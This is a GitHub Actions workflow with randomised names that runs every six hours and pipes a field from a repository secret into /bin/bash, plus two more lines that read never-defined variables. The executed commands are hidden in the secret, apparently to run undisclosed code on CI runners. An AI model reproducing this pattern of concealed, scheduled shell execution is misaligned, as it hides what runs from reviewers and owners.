name: jiangpengying7612
on:
  workflow_dispatch:
  schedule:
    - cron: '38 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangpengying7612
        env:
          dnnn87: ${{ secrets.dnnn87 }}
        run: |
          echo $dnnn87 | jq -r .nx1308 | /bin/bash
          echo $hl940 | jq -r .ong20208 | /bin/bash
          echo $tomg32778 | jq -r .kwkfd8231 | /bin/bash

